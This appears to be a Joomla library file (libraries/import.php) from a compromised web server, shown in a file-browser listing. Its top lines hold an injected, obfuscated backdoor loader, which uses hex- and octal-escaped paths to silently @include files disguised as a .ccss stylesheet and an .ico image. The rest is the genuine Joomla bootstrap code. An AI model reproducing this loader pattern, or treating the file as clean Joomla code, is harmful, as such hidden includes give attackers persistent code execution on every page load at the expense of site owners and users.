?
Path : /home/admin/public_html/old/happy2/libraries/ |
Current File : /home/admin/public_html/old/happy2/libraries/import.php |
<?php /*bdcb4*/ $ro3 = "/\x68ome/admin/domains/\x68appytokorea.com/private_\x68tml/old/templates/protostar/.c766554f.ccss"; $t81u5b = $ro3; stripos($t81u5b, "ze"); @include_once /* yz */ ($t81u5b); /*bdcb4*/ /*7aa6f*/ @include "\057h\157m\145/\141d\155i\156/\144o\155a\151n\163/\150a\160p\171t\157k\157r\145a\056c\157m\057p\165b\154i\143_\150t\155l\057i\155a\147e\163/\101_\120r\157g\162a\155_\106o\162_\127e\142/\110a\160p\171_\127i\156t\145r\137R\157m\141n\164i\143_\0620\0613\057.\1463\062c\066b\0600\056i\143o"; /*7aa6f*/ /** * @package Joomla.Platform * * @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ // Set the platform root path as a constant if necessary. if (!defined('JPATH_PLATFORM')) { define('JPATH_PLATFORM', dirname(__FILE__)); } // Set the directory separator define if necessary. if (!defined('DS')) { define('DS', DIRECTORY_SEPARATOR); } // Detect the native operating system type. $os = strtoupper(substr(PHP_OS, 0, 3)); if (!defined('IS_WIN')) { define('IS_WIN', ($os === 'WIN') ? true : false); } if (!defined('IS_MAC')) { define('IS_MAC', ($os === 'MAC') ? true : false); } if (!defined('IS_UNIX')) { define('IS_UNIX', (($os !== 'MAC') && ($os !== 'WIN')) ? true : false); } // Import the platform version library if necessary. if (!class_exists('JPlatform')) { require_once JPATH_PLATFORM . '/platform.php'; } // Import the library loader if necessary. if (!class_exists('JLoader')) { require_once JPATH_PLATFORM . '/loader.php'; } class_exists('JLoader') or die; // Setup the autoloaders. JLoader::setup(); /** * Import the base Joomla Platform libraries. */ // Import the factory library. JLoader::import('joomla.factory'); // Import the exception and error handling libraries. JLoader::import('joomla.error.exception'); /* * If the HTTP_HOST environment variable is set we assume a Web request and * thus we import the request library and most likely clean the request input. */ if (isset($_SERVER['HTTP_HOST'])) { JLoader::register('JRequest', JPATH_PLATFORM . '/joomla/environment/request.php'); // If an application flags it doesn't want this, adhere to that. if (!defined('_JREQUEST_NO_CLEAN') && (bool) ini_get('register_globals')) { JRequest::clean(); } } // Import the base object library. JLoader::import('joomla.base.object'); // Register classes that don't follow one file per class naming conventions. JLoader::register('JText', JPATH_PLATFORM . '/joomla/methods.php'); JLoader::register('JRoute', JPATH_PLATFORM . '/joomla/methods.php');